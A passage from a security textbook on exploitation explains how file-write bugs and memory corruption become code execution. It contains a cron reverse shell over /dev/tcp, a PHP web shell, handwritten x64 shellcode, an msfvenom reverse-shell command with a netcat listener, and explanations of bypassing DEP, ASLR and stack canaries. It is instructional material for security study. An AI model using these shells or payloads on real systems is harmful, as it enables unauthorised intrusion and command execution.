Exploiting High-Privileged File Writes

If an application is running with elevated privileges, such as root or administrator privileges, your options for exploiting an arbitrary file write are expansive. One technique is to overwrite executables or libraries that you know will get executed, such as the executable running the network service you’re exploiting. Many platforms provide other means of executing code, such as scheduled tasks, or cron jobs on Linux.

If you have high privileges, you can write your own cron jobs to a directory and execute them. On modern Linux systems, there’s usually a number of cron directories already inside /etc that you can write to, each with a suffix that indicates when the jobs will be executed. However, writing to these directories requires you to give the script file executable permissions. If your arbitrary file write only provides read and write permissions, you’ll need to write to /etc/cron.d with a Crontab file to execute arbitrary system commands. Listing 10-9 shows an example of a simple Crontab file that will run once a minute and connect a shell process to an arbitrary host and TCP port where you can access system commands.

* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'

Listing 10-9: A simple reverse shell Crontab file

This Crontab file must be written to /etc/cron.d/run_shell. Note that some versions of bash don’t support this reverse shell syntax, so you would have to use something else, such as a Python script, to achieve the same result. Now let’s look at how to exploit write vulnerabilities with low-privileged file writes.

Exploiting Low-Privileged File Writes

If you don’t have high privileges when a write occurs, all is not lost; however, your options are more limited, and you’ll still need to understand what is available on the system to exploit. For example, if you’re trying to exploit a web application or there’s a web server install on the machine, it might be possible to drop a server-side rendered web page, which you can then access through a web server. Many web servers will also have PHP installed, which allows you to execute commands as the web server user and return the result of that command by writing the file shown in Listing 10-10 to the web root (it might be in /var/www/html or one of many other locations) with a .php extension.

<?php
if (isset($_REQUEST['exec'])) {
  $exec = $_REQUEST['exec'];
  $result = system($exec);
  echo $result;
}
?>

Listing 10-10: A simple PHP shell

After you’ve dropped this PHP shell to the web root, you can execute arbitrary commands on the system in the context of the web server by requesting a URL in the form http://server/shell.php?exec=CMD. The URL will result in the PHP code being executed on the server: the PHP shell will extract the exec parameter from the URL and pass it to the system API, with the result of executing the arbitrary command CMD.

Another advantage of PHP is that it doesn’t matter what else is in the file when it’s written: the PHP parser will look for the <?php … ?> tags and execute any PHP code within those tags regardless of whatever else is in the file. This is useful when you don’t have full control over what’s written to a file during the vulnerability exploitation.

Writing Shell Code

Now let’s look at how to start writing your own shell code. Using this shell code, you can execute arbitrary commands within the context of the application you’re exploiting with your discovered memory corruption vulnerability.

Writing your own shell code can be complex, and although I can’t do it full justice in the remainder of this chapter, I’ll give you some examples you can build on as you continue your own research into the subject. I’ll start with some basic techniques and challenges of writing x64 code using the Linux platform.

Getting Started

To start writing shell code, you need the following:

• An installation of Linux x64.

• A compiler; both GCC and CLANG are suitable.

• A copy of the Netwide Assembler (NASM); most Linux distributions have a package available for this.

On Debian and Ubuntu, the following command should install everything you need:

sudo apt-get install build-essential nasm

We’ll write the shell code in x64 assembly language and assemble it using nasm, a binary assembler. Assembling your shell code should result in a binary file containing just the machine instructions you specified. To test your shell code, you can use Listing 10-11, written in C, to act as a test harness.

test_shellcode.c

 #include <fcntl.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <unistd.h>

 typedef int (*exec_code_t)(void);

 int main(int argc, char** argv) {
   if (argc < 2) {
     printf("Usage: test_shellcode shellcode.bin ");
     exit(1);
   }

int fd = open(argv[1], O_RDONLY);
   if (fd <= 0) {
     perror("open");
     exit(1);
   }

   struct stat st;
   if (fstat(fd, &st) == -1) {
     perror("stat");
     exit(1);
   }

exec_code_t shell = mmap(NULL, st.st_size,
   PROT_EXEC | PROT_READ, MAP_PRIVATE, fd, 0);

   if (shell == MAP_FAILED) {
     perror("mmap");
     exit(1);
   }

   printf("Mapped Address: %p ", shell);
   printf("Shell Result: %d ", shell());

   return 0;
 }

Listing 10-11: A shell code test harness

The code takes a path from the command line and then maps it into memory as a memory-mapped file . We specify that the code is executable with the PROT_EXEC flag ; otherwise, various platform-level exploit mitigations could potentially stop the shell code from executing.

Compile the test code using the installed C compiler by executing the following command at the shell. You shouldn’t see any warnings during compilation.

$ cc –Wall –o test_shellcode test_shellcode.c

To test the code, put the following assembly code into the file shellcode.asm, as shown in Listing 10-12.

; Assemble as 64 bit
BITS 64
mov rax, 100
ret

Listing 10-12: A simple shell code example

The shell code in Listing 10-12 simply moves the value 100 to the RAX register. The RAX register is used as the return value for a function call. The test harness will call this shell code as if it were a function, so we would expect the value of the RAX register to be returned to the test harness. The shell code then immediately issues the ret instruction, jumping back to the caller of the shell code, which in this case is our test harness. The test harness should then print out the return value of 100, if successful.

Let’s try it out. First, we’ll need to assemble the shell code using nasm, and then we’ll execute it in the harness:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7fa51e860000
Shell Result: 100

The output returns 100 to the test harness, verifying that we’re successfully loading and executing the shell code. It’s also worth verifying that the assembled code in the resulting binary matches what we would expect. We can check this with the companion ndisasm tool, which disassembles this simple binary file without having to use a disassembler, such as IDA Pro. We need to use the -b 64 switch to ensure ndisasm uses 64-bit disassembly, as shown here:

$ ndisasm -b 64 shellcofe.bin
00000000  B864000000        mov eax,0x64
00000005  C3                ret

The output from ndisasm should match up with the instructions we specified in the original shell code file in Listing 10-12. Notice that we used the RAX register in the mov instruction, but in the disassembler output we find the EAX register. The assembler uses this 32-bit register rather than a 64-bit register because it realizes that the constant 0x64 fits into a 32-bit constant, so it can use a shorter instruction rather than loading an entire 64-bit constant. This doesn’t change the behavior of the code because, when loading the constant into EAX, the processor will automatically set the upper 32 bits of the RAX register to zero. The BITS directive is also missing, because that is a directive for the nasm assembler to enable 64-bit support and is not needed in the final assembled output.

Simple Debugging Technique

Before you start writing more complicated shell code, let’s examine an easy debugging method. This is important when testing your full exploit, because it might not be easy to stop execution of the shell code at the exact location you want. We’ll add a breakpoint to our shell code using the int3 instruction so that when the associated code is called, any attached debugger will be notified.

Modify the code in Listing 10-12 as shown in Listing 10-13 to add the int3 breakpoint instruction and then rerun the nasm assembler.

# Assemble as 64 bit
BITS 64
int3
mov rax, 100
ret

Listing 10-13: A simple shell code example with a breakpoint

If you execute the test harness in a debugger, such as GDB, the output should be similar to Listing 10-14.

   $ gdb --args ./test_shellcode shellcode.bin
   GNU gdb 7.7.1
   ...
   (gdb) display/1i $rip
   (gdb) r
   Starting program: /home/user/test_shellcode debug_break.bin
   Mapped Address: 0x7fb6584f3000

Program received signal SIGTRAP, Trace/breakpoint trap.

   0x00007fb6584f3001 in ?? ()
   1: x/i $rip
=> 0x7fb6584f3001:      mov    $0x64,%eax
   (gdb) stepi
   0x00007fb6584f3006 in ?? ()
   1: x/i $rip
   => 0x7fb6584f3006:      retq
   (gdb)
   0x00000000004007f6 in main ()
   1: x/i $rip
   => 0x4007f6 <main+281>: mov    %eax,%esi

Listing 10-14: Setting a breakpoint on a shell

When we execute the test harness, the debugger stops on a SIGTRAP signal . The reason is that the processor has executed the int3 instruction, which acts as a breakpoint, resulting in the OS sending the SIGTRAP signal to the process that the debugger handles. Notice that when we print the instruction the program is currently running , it’s not the int3 instruction but instead the mov instruction immediately afterward. We don’t see the int3 instruction because the debugger has automatically skipped over it to allow the execution to continue.

Calling System Calls

The example shell code in Listing 10-12 only returns the value 100 to the caller, in this case our test harness, which is not very useful for exploiting a vulnerability; for that, we need the system to do some work for us. The easiest way to do that in shell code is to use the OS’s system calls. A system call is specified using a system call number defined by the OS. It allows you to call basic system functions, such as opening files and executing new processes.

Using system calls is easier than calling into system libraries because you don’t need to know the memory location of other executable code, such as the system C library. Not needing to know library locations makes your shell code simpler to write and more portable across different versions of the same OS.

However, there are downsides to using system calls: they generally implement much lower-level functionality than the system libraries, making them more complicated to call, as you’ll see. This is especially true on Windows, which has very complicated system calls. But for our purposes, a system call will be sufficient for demonstrating how to write your own shell code.

System calls have their own defined application binary interface (ABI) (see “Application Binary Interface” on page 123 for more details). In x64 Linux, you execute a system call using the following ABI:

• The number of the system call is placed in the RAX register.

• Up to six arguments can be passed into the system call in the registers RDI, RSI, RDX, R10, R8 and R9.

• The system call is issued using the syscall instruction.

• The result of the system call is stored in RAX after the syscall instruction returns.

For more information about the Linux system call process, run man 2 syscall on a Linux command line. This page contains a manual that describes the system call process and defines the ABI for various different architectures, including x86 and ARM. In addition, man 2 syscalls lists all the available system calls. You can also read the individual pages for a system call by running man 2 <SYSTEM CALL NAME>.

The exit System Call

To use a system call, we first need the system call number. Let’s use the exit system call as an example.

How do we find the number for a particular system call? Linux comes with header files, which define all the system call numbers for the current platform, but trying to find the right header file on disk can be like chasing your own tail. Instead, we’ll let the C compiler do the work for us. Compile the C code in Listing 10-15 and execute it to print the system call number of the exit system call.

#include <stdio.h>
#include <sys/syscall.h>

int main() {
  printf("Syscall: %d ", SYS_exit);
  return 0;
}

Listing 10-15: Getting the system call number

On my system, the system call number for exit is 60, which is printed to my screen; yours may be different depending on the version of the Linux kernel you’re using, although the numbers don’t change very often. The exit system call specifically takes process exit code as a single argument to return to the OS and indicate why the process exited. Therefore, we need to pass the number we want to use for the process exit code into RDI. The Linux ABI specifies that the first parameter to a system call is specified in the RDI register. The exit system call doesn’t return anything from the kernel; instead, the process (the shell) is immediately terminated. Let’s implement the exit call. Assemble Listing 10-16 with nasm and run it inside the test harness.

BITS 64
; The syscall number of exit
mov rax, 60
; The exit code argument
mov rdi, 42
syscall

; exit should never return, but just in case.
ret

Listing 10-16: Calling the exit system call in shell code

Notice that the first print statement in Listing 10-16, which shows where the shell code was loaded, is still printed, but the subsequent print statement for the return of the shell code is not. This indicates the shell code has successfully called the exit system call. To double-check this, you can display the exit code from the test harness in your shell, for example, by using echo $? in bash. The exit code should be 42, which is what we passed in the mov rdi argument.

The write System Call

Now let’s try calling write, a slightly more complicated system call that writes data to a file. Use the following syntax for the write system call:

ssize_t write(int fd, const void *buf, size_t count);

The fd argument is the file descriptor to write to. It holds an integer value that describes which file you want to access. Then you declare the data to be written by pointing the buffer to the location of the data. You can specify how many bytes to write using count.

Using the code in Listing 10-17, we’ll pass the value 1 to the fd argument, which is the standard output for the console.

BITS 64

%define SYS_write 1
%define STDOUT 1

_start:
  mov rax, SYS_write
; The first argument (rdi) is the STDOUT file descriptor
  mov rdi, STDOUT
; The second argument (rsi) is a pointer to a string
  lea rsi, [_greeting]
; The third argument (rdx) is the length of the string to write
  mov rdx, _greeting_end - _greeting
; Execute the write system call
  syscall
  ret

_greeting:
  db "Hello User!", 10
_greeting_end:

Listing 10-17: Calling the write system call in shell code

By writing to standard output, we’ll print the data specified in buf to the console so we can see whether it worked. If successful, the string Hello User! should be printed to the shell console that the test harness is running on. The write system call should also return the number of bytes written to the file.

Now assemble Listing 10-17 with nasm and execute the binary in the test harness:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7f165ce1f000
Shell Result: -14

Instead of printing the Hello User! greeting we were expecting, we get a strange result, -14. Any value returning from the write system call that’s less than zero indicates an error. On Unix-like systems, including Linux, there’s a set of defined error numbers (abbreviated as errno). The error code is defined as positive in the system but returns as negative to indicate that it’s an error condition. You can look up the error code in the system C header files, but the short Python script in Listing 10-18 will do the work for us.

import os

# Specify the positive error number
err = 14
print os.errno.errorcode[err]
# Prints 'EFAULT'
print os.strerror(err)
# Prints 'Bad address'

Listing 10-18: A simple Python script to print error codes

Running the script will print the error code name as EFAULT and the string description as Bad address. This error code indicates that the system call tried to access some memory that was invalid, resulting in a memory fault. The only memory address we’re passing is the pointer to the greeting. Let’s look at the disassembly to find out whether the pointer we’re passing is at fault:

00000000  B801000000        mov rax,0x1
00000005  BF01000000        mov rdi,0x1
0000000A  488D34251A000000  lea rsi,[0x1a]
00000012  BA0C000000        mov rdx,0xc
00000017  0F05              syscall
00000019  C3                ret
0000001A  db "Hello User!", 10

Now we can see the problem with our code: the lea instruction, which loads the address to the greeting, is loading the absolute address 0x1A. But if you look at the test harness executions we’ve done so far, the address at which we load the executable code isn’t at 0x1A or anywhere close to it. This mismatch between the location where the shell code loads and the absolute addresses causes a problem. We can’t always determine in advance where the shell code will be loaded in memory, so we need a way of referencing the greeting relative to the current executing location. Let’s look at how to do this on 32-bit and 64-bit x86 processors.

Accessing the Relative Address on 32- and 64-Bit Systems

In 32-bit x86 mode, the simplest way of getting a relative address is to take advantage of the fact that the call instruction works with relative addresses. When a call instruction executes, it pushes the absolute address of the subsequent instruction onto the stack as a return address. We can use this absolute return address value to calculate where the current shell code is executing from and adjust the memory address of the greeting to match. For example, replace the lea instruction in Listing 10-17 with the following code:

call _get_rip
_get_rip:
; Pop return address off the stack
pop rsi
; Add relative offset from return to greeting
add rsi, _greeting - _get_rip

Using a relative call works well, but it massively complicates the code. Fortunately, the 64-bit instruction set introduced relative data addressing. We can access this in nasm by adding the rel keyword in front of an address. By changing the lea instruction as follows, we can access the address of the greeting relative to the current executing instruction:

lea rsi, [rel _greeting]

Now we can reassemble our shell code with these changes, and the message should print successfully:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7f165dedf000
Hello User!
Shell Result: 12

Executing the Other Programs

Let’s wrap up our overview of system calls by executing another binary using the execve system call. Executing another binary is a common technique for getting execution on a target system that doesn’t require long, complicated shell code. The execve system call takes three parameters: the path to the program to run, an array of command line arguments with the array terminated by NULL, and an array of environment variables terminated by NULL. Calling execve requires a bit more work than calling simple system calls, such as write, because we need to build the arrays on the stack; however, it’s not that hard. Listing 10-19 executes the uname command by passing it the -a argument.

execve.asm

 BITS 64

 %define SYS_execve 59

 _start:
   mov rax, SYS_execve
 ; Load the executable path
lea rdi, [rel _exec_path]
 ; Load the argument
   lea rsi, [rel _argument]
 ; Build argument array on stack = { _exec_path, _argument, NULL }
push 0
   push rsi
   push rdi
mov rsi, rsp
 ; Build environment array on stack = { NULL }
   push 0
mov rdx, rsp
syscall
 ; execve shouldn't return, but just in case
   ret

 _exec_path:
   db "/bin/uname", 0
 _argument:
   db "-a", 0

Listing 10-19: Executing an arbitrary executable in shell code

The shellcode in Listing 10-19 is complex, so let’s break it down step-by-step. First, the addresses of two strings, "/bin/uname" and "-a", are loaded into registers . The addresses of the two strings with the final NUL (which is represented by a 0) are then pushed onto the stack in reverse order . The code copies the current address of the stack to the RSI register, which is the second argument to the system call . Next, a single NUL is pushed on the stack for the environment array, and the address on the stack is copied to the RDX register , which is the third argument to the system call. The RDI register already contains the address of the "/bin/uname" string so our shell code does not need to reload the address before calling the system call. Finally, we execute the execve system call , which executes the shell equivalent of the following C code:

char* args[] = { "/bin/uname",  "-a", NULL };
char* envp[] = { NULL };
execve("/bin/uname", args, envp);

If you assemble the execve shell code, you should see output similar to the following, where command line /bin/uname -a is executed:

$ nasm -f bin -o execve.bin execve.asm
$ ./test_shellcode execv.bin

Mapped Address: 0x7fbdc3c1e000
Linux foobar 4.4.0 Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux

Generating Shell Code with Metasploit

It’s worth practicing writing your own shell code to gain a deeper understanding of it. However, because people have been writing shell code for a long time, a wide range of shell code to use for different platforms and purposes is already available online.

The Metasploit project is one useful repository of shell code. Metasploit gives you the option of generating shell code as a binary blob, which you can easily plug into your own exploit. Using Metasploit has many advantages:

• Handling encoding of the shell code by removing banned characters or formatting to avoid detection

• Supporting many different methods of gaining execution, including simple reverse shell and executing new binaries

• Supporting multiple platforms (including Linux, Windows, and macOS) as well as multiple architectures (such as x86, x64, and ARM)

I won’t explain in great detail how to build Metasploit modules or use their staged shell code, which requires the use of the Metasploit console to interact with the target. Instead, I’ll use a simple example of a reverse TCP shell to show you how to generate shell code using Metasploit. (Recall that a reverse TCP shell allows the target machine to communicate with the attacker’s machine via a listening port, which the attacker can use to gain execution.)

Accessing Metasploit Payloads

The msfvenom command line utility comes with a Metasploit installation, which provides access to the various shell code payloads built into Metasploit. We can list the payloads supported for x64 Linux using the -l option and filtering the output:

# msfvenom -l | grep linux/x64
--snip--
linux/x64/shell_bind_tcp    Listen for a connection and spawn a command shell
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell

We’ll use two shell codes:

shell_bind_tcp Binds to a TCP port and opens a local shell when connected to it

shell_reverse_tcp Attempts to connect back to your machine with a shell attached

Both of these payloads should work with a simple tool, such as Netcat, by either connecting to the target system or listening on the local system.

Building a Reverse Shell

When generating the shell code, you must specify the listening port (for bind and reverse shell) and the listening IP (for reverse shell, this is your machine’s IP address). These options are specified by passing LPORT=port and LHOST=IP, respectively. We’ll use the following code to build a reverse TCP shell, which will connect to the host 172.21.21.1 on TCP port 4444:

# msfvenom -p linux/x64/shell_reverse_tcp -f raw LHOST=172.21.21.1
           LPORT=4444 > msf_shellcode.bin

The msfvenom tool outputs the shell code to standard output by default, so you’ll need to pipe it to a file; otherwise, it will just print to the console and be lost. We also need to specify the -f raw flag to output the shell code as a raw binary blob. There are other potential options as well. For example, you can output the shell code to a small .elf executable, which you can run directly for testing. Because we have a test harness, we won’t need to do that.

Executing the Payload

To execute the payload, we need to set up a listening instance of netcat listening on port 4444 (for example, nc -l 4444). It’s possible that you won’t see a prompt when the connection is made. However, typing the id command should echo back the result:

$ nc -l 4444
# Wait for connection
id
uid=1000(user) gid=1000(user) groups=1000(user)

The result shows that the shell successfully executed the id command on the system the shell code is running on and printed the user and group IDs from the system. You can use a similar payload on Windows, macOS, and even Solaris. It might be worthwhile to explore the various options in msfvenom on your own.

Memory Corruption Exploit Mitigations

In “Exploiting Memory Corruption Vulnerabilities” on page 246, I alluded to exploit mitigations and how they make exploiting memory vulnerabilities difficult. The truth is that exploiting a memory corruption vulnerability on most modern platforms can be quite complicated due to exploit mitigations added to the compilers (and the generated application) as well as to the OS.

Security vulnerabilities seem to be an inevitable part of software development, as do significant chunks of source code written in memory-unsafe languages that are not updated for long periods of time. Therefore, it’s unlikely that memory corruption vulnerabilities will disappear overnight.

Instead of trying to fix all these vulnerabilities, developers have implemented clever techniques to mitigate the impact of known security weaknesses. Specifically, these techniques aim to make exploitation of memory corruption vulnerabilities difficult or, ideally, impossible. In this section, I’ll describe some of the exploit mitigation techniques used in contemporary platforms and development tools that make it more difficult for attackers to exploit these vulnerabilities.

Data Execution Prevention

As you saw earlier, one of the main aims when developing an exploit is to gain control of the instruction pointer. In my previous explanation, I glossed over problems that might occur when placing your shell code in memory and executing it. On modern platforms, you’re unlikely to be able to execute arbitrary shell code as easily as described earlier due to Data Execution Prevention (DEP) or No-Execute (NX) mitigation.

DEP attempts to mitigate memory corruption exploitation by requiring memory with executable instructions to be specially allocated by the OS. This requires processor support so that if the process tries to execute memory at an address that’s not marked as executable, the processor raises an error. The OS then terminates the process in error to prevent further execution.

The error resulting from executing nonexecutable memory can be hard to spot and look confusing at first. Almost all platforms misreport the error as Segmentation fault or Access violation on what looks like potentially legitimate code. You might mistake this error for the instruction’s attempt to access invalid memory. Due to this confusion, you might spend time debugging your code to figure out why your shell code isn’t executing correctly, believing it to be a bug in your code when it’s actually DEP being triggered. For example, Listing 10-20 shows an example of a DEP crash.

GNU gdb 7.7.1
(gdb) r
Starting program: /home/user/triage/dep

Program received signal SIGSEGV, Segmentation fault.
0xbffff730 in ?? ()

(gdb) x/3i $pc
=> 0xbffff730:  push   $0x2a
   0xbffff732:  pop    %eax
   0xbffff733:  ret

Listing 10-20: An example crash from executing nonexecutable memory

It’s tricky to determine the source of this crash. At first glance, you might think it’s due to an invalid stack pointer, because the push instruction at would result in the same error. Only by looking at where the instruction is located can you discover it was executing nonexecutable memory. You can determine whether it’s in executable memory by using the memory map commands described in Table 10-8.

DEP is very effective in many cases at preventing easy exploitation of memory corruption vulnerabilities, because it’s easy for a platform developer to limit executable memory to specific executable modules, leaving areas like the heap or stack nonexecutable. However, limiting executable memory in this way does require hardware and software support, leaving software vulnerable due to human error. For example, when exploiting a simple network-connected device, it might be that the developers haven’t bothered to enable DEP or that the hardware they’re using doesn’t support it.

If DEP is enabled, you can use the return-oriented programming method as a workaround.

Return-Oriented Programming Counter-Exploit

The development of the return-oriented programming (ROP) technique was in direct response to the increase in platforms equipped with DEP. ROP is a simple technique that repurposes existing, already executable instructions rather than injecting arbitrary instructions into memory and executing them. Let’s look at a simple example of a stack memory corruption exploit using this technique.

On Unix-like platforms, the C library, which provides the basic API for applications such as opening files, also has functions that allow you to start a new process by passing the command line in program code. The system() function is such a function and has the following syntax:

int system(const char *command);

The function takes a simple command string, which represents the program to run and the command line arguments. This command string is passed to the command interpreter, which we’ll come back to later. For now, know that if you write the following in a C application, it executes the ls application in the shell:

system("ls");

If we know the address of the system API in memory, we can redirect the instruction pointer to the start of the API’s instructions; in addition, if we can influence the parameter in memory, we can start a new process under our control. Calling the system API allows you to bypass DEP because, as far as the processor and platform are concerned, you’re executing legitimate instructions in memory marked as executable. Figure 10-8 shows this process in more detail.

In this very simple visualization, ROP executes a function provided by the C library (libc) to bypass DEP. This technique, specifically called Ret2Libc, laid the foundation of ROP as we know it today. You can generalize this technique to write almost any program using ROP, for example, to implement a full Turing complete system entirely by manipulating the stack.

image

Figure 10-8: A simple ROP to call the system API

The key to understanding ROP is to know that a sequence of instructions doesn’t have to execute as it was originally compiled into the program’s executable code. This means you can take small snippets of code throughout the program or in other executable code, such as libraries, and repurpose them to perform actions the developers didn’t originally intend to execute. These small sequences of instructions that perform some useful function are called ROP gadgets. Figure 10-9 shows a more complex ROP example that opens a file and then writes a data buffer to the file.

image

Figure 10-9: A more complex ROP calling open and then writing to the file by using a couple of gadgets

Because the value of the file descriptor returning from open probably can’t be known ahead of time, this task would be more difficult to do using the simpler Ret2Libc technique.

Populating the stack with the correct sequence of operations to execute as ROP is easy if you have a stack buffer overflow. But what if you only have some other method of gaining the initial code execution, such as a heap buffer overflow? In this case, you’ll need a stack pivot, which is a ROP gadget that allows you to set the current stack pointer to a known value. For example, if after the exploit EAX points to a memory buffer you control (perhaps it’s a VTable pointer), you can gain control over the stack pointer and execute your ROP chain using a gadget that looks like Listing 10-21.

xchg esp, eax # Exchange the EAX and ESP registers
ret           # Return, will execute address on new stack

Listing 10-21: Gaining execution using a ROP gadget

The gadget shown in Listing 10-21 switches the register value EAX with the value ESP, which indexes the stack in memory. Because we control the value of EAX, we can pivot the stack location to the set of operations (such as in Figure 10-9), which will execute our ROP.

Unfortunately, using ROP to get around DEP is not without problems. Let’s look at some ROP limitations and how to deal with them.

Address Space Layout Randomization (ASLR)

Using ROP to bypass DEP creates a couple of problems. First, you need to know the location of the system functions or ROP gadgets you’re trying to execute. Second, you need to know the location of the stack or other memory locations to use as data. However, finding locations wasn’t always a limiting factor.

When DEP was first introduced into Windows XP SP2, all system binaries and the main executable file were mapped in consistent locations, at least for a given update revision and language. (This is why earlier Metasploit modules require you to specify a language). In addition, the operation of the heap and the locations of thread stacks were almost completely predictable. Therefore, on XP SP2 it was easy to circumvent DEP, because you could guess the location of all the various components you might need to execute your ROP chain.

Memory Information Disclosure Vulnerabilities

With the introduction of Address Space Layout Randomization (ASLR), bypassing DEP became more difficult. As its name suggests, the goal of this mitigation method is to randomize the layout of a process’s address space to make it harder for an attacker to predict. Let’s look at a couple of ways that an exploit can bypass the protections provided by ASLR.

Before ASLR, information disclosure vulnerabilities were typically useful for circumventing an application’s security by allowing access to protected information in memory, such as passwords. These types of vulnerabilities have found a new use: revealing the layout of the address space to counter randomization by ASLR.

For this kind of exploit, you don’t always need to find a specific memory information disclosure vulnerability; in some cases, you can create an information disclosure vulnerability from a memory corruption vulnerability. Let’s use an example of a heap memory corruption vulnerability. We can reliably overwrite an arbitrary number of bytes after a heap allocation, which can in turn be used to disclose the contents of memory using a heap overflow like so: one common structure that might be allocated on the heap is a buffer containing a length-prefixed string, and when the string buffer is allocated, an additional number of bytes is placed at the front to accommodate a length field. The string data is then stored after the length, as shown in Figure 10-10.

image

Figure 10-10: Converting memory corruption to information disclosure

At the top is the original pattern of heap allocations . If the vulnerable allocation is placed prior to the string buffer in memory, we would have the opportunity to corrupt the string buffer. Prior to any corruption occurring, we can only read the 5 valid bytes from the string buffer.

At the bottom, we cause the vulnerable allocation to overflow by just enough to modify only the length field of the string . We can set the length to an arbitrary value, in this case, 100 bytes. Now when we read back the string, we’ll get back 100 bytes instead of only the 5 bytes that were originally allocated. Because the string buffer’s allocation is not that large, data from other allocations would be returned, which could include sensitive memory addresses, such as VTable pointers and heap allocation pointers. This disclosure gives you enough information to bypass ASLR.

Exploiting ASLR Implementation Flaws

The implementation of ASLR is never perfect due to limitations of performance and available memory. These shortcomings lead to various implementation-specific flaws, which you can also use to disclose the randomized memory locations.

Most commonly, the location of an executable in ASLR isn’t always randomized between two separate processes, which would result in a vulnerability that could disclose the location of memory from one connection to a networked application, even if that might cause that particular process to crash. The memory address could then be used in a subsequent exploit.

On Unix-like systems, such as Linux, this lack of randomization should only occur if the process being exploited is forked from an existing master process. When a process forks, the OS creates an identical copy of the original process, including all loaded executable code. It’s fairly common for servers, such as Apache, to use a forking model to service new connections. A master process will listen on a server socket waiting for new connections, and when one is made, a new copy of the current process is forked and the connected socket gets passed to service the connection.

On Windows systems, the flaw manifests in a different way. Windows doesn’t really support forking processes, although once a specific executable file load address has been randomized, it will always be loaded to that same address until the system is rebooted. If this wasn’t done, the OS wouldn’t be able to share read-only memory between processes, resulting in increased memory usage.

From a security perspective, the result is that if you can leak a location of an executable once, the memory locations will stay the same until the system is rebooted. You can use this to your advantage because you can leak the location from one execution (even if it causes the process to crash) and then use that address for the final exploit.

Bypassing ASLR Using Partial Overwrites

Another way to circumvent ASLR is to use partial overwrites. Because memory tends to be split into distinct pages, such as 4096 bytes, operating systems restrict how random layout memory and executable code can load. For example, Windows does memory allocations on 64KB boundaries. This leads to an interesting weakness in that the lower bits of random memory pointers can be predictable even if the upper bits are totally random.

The lack of randomization in the lower bits might not sound like much of an issue, because you would still need to guess the upper bits of the address if you’re overwriting a pointer in memory. Actually, it does allow you to selectively overwrite part of the pointer value when running on a little endian architecture due to the way that pointer values are stored in memory.

The majority of processor architectures in use today are little endian (I discussed endianness in more detail in “Binary Endian” on page 41). The most important detail to know about little endian for partial overwrites is that the lower bits of a value are stored at a lower address. Memory corruptions, such as stack or heap overflows, typically write from a low to a high address. Therefore, if you can control the length of the overwrite, it would be possible to selectively overwrite only the predictable lower bits but not the randomized higher bits. You can then use the partial overwrite to convert a pointer to address another memory location, such as a ROP gadget. Figure 10-11 shows how to change a memory pointer using a partial overwrite.

image

Figure 10-11: An example of a short overwrite

We start with an address of 0x07060504. We know that, due to ASLR, the top 16 bits (the 0x0706 part) are randomized, but the lower 16 bits are not. If we know what memory the pointer is referencing, we can selectively change the lower bits and accurately specify a location to control. In this example, we overwrite the lower 16 bits to make a new address of 0x0706BBAA.

Detecting Stack Overflows with Memory Canaries

Memory canaries, or cookies, are used to prevent exploitation of a memory corruption vulnerability by detecting the corruption and immediately causing the application to terminate. You’ll most commonly encounter them in reference to stack memory corruption prevention, but canaries are also used to protect other types of data structures, such as heap headers or virtual table pointers.

A memory canary is a random number generated by an application during startup. The random number is stored in a global memory location so it can be accessed by all code in the application. This random number is pushed onto the stack when entering a function. Then, when the function is exited, the random value is popped off the stack and compared to the global value. If the global value doesn’t match what was popped off the stack, the application assumes the stack memory has been corrupted and terminates the process as quickly as possible. Figure 10-12 shows how inserting this random number detects danger, like a canary in a coal mine, helping to prevent the attacker from gaining access to the return address.

image

Figure 10-12: A stack overflow with a stack canary

Placing the canary below the return address on the stack ensures that any overflow corruption that would modify the return address would also modify the canary. As long as the canary value is difficult to guess, the attacker can’t gain control over the return address. Before the function returns, it calls code to check whether the stack canary matches what it expects. If there’s a mismatch, the program immediately crashes.

Bypassing Canaries by Corrupting Local Variables

Typically, stack canaries protect only the return address of the currently executing function on the stack. However, there are more things on the stack that can be exploited than just the buffer that’s being overflowed. There might be pointers to functions, pointers to class objects that have a virtual function table, or, in some cases, an integer variable that can be overwritten that might be enough to exploit the stack overflow.

If the stack buffer overflow has a controlled length, it might be possible to overwrite these variables without ever corrupting the stack canary. Even if the canary is corrupted, it might not matter as long as the variable is used before the canary is checked. Figure 10-13 shows how attackers might corrupt local variables without affecting the canary.

In this example, we have a function with a function pointer on the stack. Due to how the stack memory is laid out, the buffer we’ll overflow is at a lower address than the function pointer f, which is also located on the stack .

When the overflow executes, it corrupts all memory above the buffer, including the return address and the stack canary . However, before the canary checking code runs (which would terminate the process), the function pointer f is used. This means we still get code execution by calling through f, and the corruption is never detected.

image

Figure 10-13: Corrupting local variables without setting off the stack canary

There are many ways in which modern compilers can protect against corrupting local variables, including reordering variables so buffers are always above any single variable, which when corrupted, could be used to exploit the vulnerability.

Bypassing Canaries with Stack Buffer Underflow

For performance reasons, not every function will place a canary on the stack. If the function doesn’t manipulate a memory buffer on the stack, the compiler might consider it safe and not emit the instructions necessary to add the canary. In most cases, this is the correct thing to do. However, some vulnerabilities overflow a stack buffer in unusual ways: for example, the vulnerability might cause an underflow instead of an overflow, corrupting data lower in the stack. Figure 10-14 shows an example of this kind of vulnerability.

Figure 10-14 illustrates three steps. First, the function DoSomething() is called . This function sets up a buffer on the stack. The compiler determines that this buffer needs to be protected, so it generates a stack canary to prevent an overflow from overwriting the return address of DoSomething(). Second, the function calls the Process() method, passing a pointer to the buffer it set up. This is where the memory corruption occurs. However, instead of overflowing the buffer, Process() writes to a value below, for example, by referencing p[-1] . This results in corruption of the return address of the Process() method’s stack frame that has stack canary protection. Third, Process() returns to the corrupted return address, resulting in shell code execution .

image

Figure 10-14: Stack buffer underflow

Final Words

